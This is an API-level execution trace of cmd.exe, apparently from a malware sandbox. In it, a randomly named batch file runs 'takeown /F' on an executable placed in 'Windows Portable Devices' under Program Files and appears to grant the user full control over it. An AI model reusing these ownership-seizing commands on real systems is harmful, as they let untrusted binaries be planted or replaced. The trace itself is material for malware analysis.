_wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.283] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.283] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.283] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.283] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0285.283] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0285.283] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0285.283] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0285.283] SetErrorMode (uMode=0x0) returned 0x0 [0285.283] SetErrorMode (uMode=0x1) returned 0x0 [0285.283] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x127cd60, lpFilePart=0xfcea74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcea74*="Desktop") returned 0x1d [0285.283] SetErrorMode (uMode=0x0) returned 0x1 [0285.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.283] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.283] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0285.283] GetLastError () returned 0x2 [0285.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.284] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0285.284] GetLastError () returned 0x2 [0285.284] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.284] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0x1270b68 [0285.284] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0285.284] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0285.284] GetLastError () returned 0x2 [0285.285] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0x1270b68 [0285.285] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0285.285] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.285] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.285] GetConsoleTitleW (in: lpConsoleTitle=0xfcecf4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0285.345] InitializeProcThreadAttributeList (in: lpAttributeList=0xfcec20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfcec04 | out: lpAttributeList=0xfcec20, lpSize=0xfcec04) returned 1 [0285.345] UpdateProcThreadAttribute (in: lpAttributeList=0xfcec20, dwFlags=0x0, Attribute=0x60001, lpValue=0xfcec0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfcec20, lpPreviousValue=0x0) returned 1 [0285.345] GetStartupInfoW (in: lpStartupInfo=0xfcec58 | out: lpStartupInfo=0xfcec58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.345] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0285.346] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0285.346] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0285.346] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfceba8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfcebf4 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"", lpProcessInformation=0xfcebf4*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x930, dwThreadId=0xee8)) returned 1 [0285.353] CloseHandle (hObject=0xb8) returned 1 [0285.353] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0285.354] GetEnvironmentStringsW () returned 0x127b300* [0285.354] FreeEnvironmentStringsA (penv="=") returned 1 [0285.354] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0287.046] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xfceb8c | out: lpExitCode=0xfceb8c*=0x0) returned 1 [0287.046] CloseHandle (hObject=0xb0) returned 1 [0287.046] _vsnwprintf (in: _Buffer=0xfcec74, _BufferCount=0x13, _Format="%08X", _ArgList=0xfceb94 | out: _Buffer="00000000") returned 8 [0287.046] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0287.046] GetEnvironmentStringsW () returned 0x127b300* [0287.046] FreeEnvironmentStringsA (penv="=") returned 1 [0287.046] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0287.046] GetEnvironmentStringsW () returned 0x127b300* [0287.046] FreeEnvironmentStringsA (penv="=") returned 1 [0287.046] DeleteProcThreadAttributeList (in: lpAttributeList=0xfcec20 | out: lpAttributeList=0xfcec20) [0287.047] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.047] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0287.780] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.780] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0287.780] _get_osfhandle (_FileHandle=0) returned 0x38 [0287.780] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0287.780] SetConsoleInputExeNameW () returned 0x1 [0287.780] GetConsoleOutputCP () returned 0x1b5 [0287.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0287.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0287.780] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0287.781] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0287.781] _get_osfhandle (_FileHandle=3) returned 0xb0 [0287.781] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0287.781] _get_osfhandle (_FileHandle=3) returned 0xb0 [0287.781] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0287.781] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0xb3, lpOverlapped=0x0) returned 1 [0287.782] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0287.782] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0287.782] _get_osfhandle (_FileHandle=3) returned 0xb0 [0287.782] GetFileType (hFile=0xb0) returned 0x1 [0287.782] _get_osfhandle (_FileHandle=3) returned 0xb0 [0287.782] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0287.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\restaurant.exe", nBufferLength=0x208, lpBuffer=0xfceb00, lpFilePart=0xfceac4 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\restaurant.exe", lpFilePart=0xfceac4*="restaurant.exe") returned 0x38 [0287.782] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0287.782] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0287.782] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0287.782] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0287.782] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0287.782] _wcsnicmp (_String1="WIBFE5~1", _String2="Windows Portable Devices", _MaxCount=0x18) returned -12 [0287.782] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\restaurant.exe", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0287.782] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0287.782] _wcsnicmp (_String1="RESTAU~1.EXE", _String2="restaurant.exe", _MaxCount=0xe) returned 12 [0287.783] _wcsicmp (_String1="set", _String2=")") returned 74 [0287.783] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0287.783] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0287.783] _wcsicmp (_String1="IF", _String2="set") returned -10 [0287.783] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0287.783] _wcsicmp (_String1="REM", _String2="set") returned -1 [0287.783] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0287.783] _tell (_FileHandle=3) returned 63 [0287.783] _close (_FileHandle=3) returned 0 [0287.783] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf148 | out: _Buffer="\r\n") returned 2 [0287.783] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.783] GetFileType (hFile=0x3c) returned 0x2 [0287.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0287.783] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf120 | out: lpMode=0xfcf120) returned 1 [0287.784] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.784] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf138, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf138*=0x2) returned 1 [0287.784] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0287.784] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0287.784] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcf144 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0287.784] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcf144 | out: _Buffer=">") returned 1 [0287.784] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.784] GetFileType (hFile=0x3c) returned 0x2 [0287.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0287.784] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf124 | out: lpMode=0xfcf124) returned 1 [0287.960] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.960] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcf13c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcf13c*=0x1e) returned 1 [0288.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.504] GetFileType (hFile=0x3c) returned 0x2 [0288.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.504] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3c4 | out: lpMode=0xfcf3c4) returned 1 [0288.653] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.653] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1288308*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcf3dc, lpReserved=0x0 | out: lpBuffer=0x1288308*, lpNumberOfCharsWritten=0xfcf3dc*=0x3) returned 1 [0289.779] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3e4 | out: _Buffer=" FN=\"restaurant.exe\" ") returned 21 [0289.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.779] GetFileType (hFile=0x3c) returned 0x2 [0289.779] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0289.779] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0290.071] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.071] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x15) returned 1 [0290.293] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf3f8 | out: _Buffer="\r\n") returned 2 [0290.293] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.293] GetFileType (hFile=0x3c) returned 0x2 [0290.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.293] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3d0 | out: lpMode=0xfcf3d0) returned 1 [0290.365] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.366] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3e8*=0x2) returned 1 [0290.608] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0290.608] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0290.608] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0290.608] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0290.608] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0290.608] _wcsicmp (_String1="set", _String2="CD") returned 16 [0290.608] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0290.608] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0290.608] _wcsicmp (_String1="set", _String2="REN") returned 1 [0290.608] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0290.608] _wcsicmp (_String1="set", _String2="SET") returned 0 [0290.609] GetConsoleTitleW (in: lpConsoleTitle=0xfcef68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.618] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0290.618] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0290.618] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0290.618] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0290.618] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0290.618] _wcsicmp (_String1="set", _String2="CD") returned 16 [0290.618] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0290.618] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0290.618] _wcsicmp (_String1="set", _String2="REN") returned 1 [0290.618] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0290.618] _wcsicmp (_String1="set", _String2="SET") returned 0 [0290.618] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0290.618] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0290.618] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0290.618] SetEnvironmentVariableW (lpName="FN", lpValue="\"restaurant.exe\"") returned 1 [0290.618] GetEnvironmentStringsW () returned 0x127b300* [0290.618] FreeEnvironmentStringsA (penv="=") returned 1 [0290.618] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.618] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0290.654] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.654] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0290.745] _get_osfhandle (_FileHandle=0) returned 0x38 [0290.745] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0290.930] SetConsoleInputExeNameW () returned 0x1 [0290.930] GetConsoleOutputCP () returned 0x1b5 [0290.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0290.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0291.265] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0291.265] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0291.265] _get_osfhandle (_FileHandle=3) returned 0xb0 [0291.265] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0291.266] _get_osfhandle (_FileHandle=3) returned 0xb0 [0291.266] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0291.266] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0xa3, lpOverlapped=0x0) returned 1 [0291.266] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0291.266] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0291.266] _get_osfhandle (_FileHandle=3) returned 0xb0 [0291.266] GetFileType (hFile=0xb0) returned 0x1 [0291.266] _get_osfhandle (_FileHandle=3) returned 0xb0 [0291.266] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0291.266] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xfceb00, lpFilePart=0xfceac4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xfceac4*="vRnqNMBW.bat") returned 0x2a [0291.266] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0291.266] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0291.266] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0291.267] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0291.267] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0291.267] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0291.267] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0291.267] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xfce808 | out: lpFindFileData=0xfce808) returned 0x1270b68 [0291.267] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0291.267] _wcsicmp (_String1="cd", _String2=")") returned 58 [0291.267] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0291.267] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0291.267] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0291.267] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0291.267] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0291.267] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0291.268] _tell (_FileHandle=3) returned 78 [0291.268] _close (_FileHandle=3) returned 0 [0291.268] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf148 | out: _Buffer="\r\n") returned 2 [0291.268] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.268] GetFileType (hFile=0x3c) returned 0x2 [0291.268] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.268] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf120 | out: lpMode=0xfcf120) returned 1 [0291.372] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.372] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf138, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf138*=0x2) returned 1 [0291.776] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0291.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0291.776] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcf144 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0291.776] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcf144 | out: _Buffer=">") returned 1 [0291.776] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.776] GetFileType (hFile=0x3c) returned 0x2 [0291.776] GetStdHandle (nStdHandle=0xfffffff5) returned 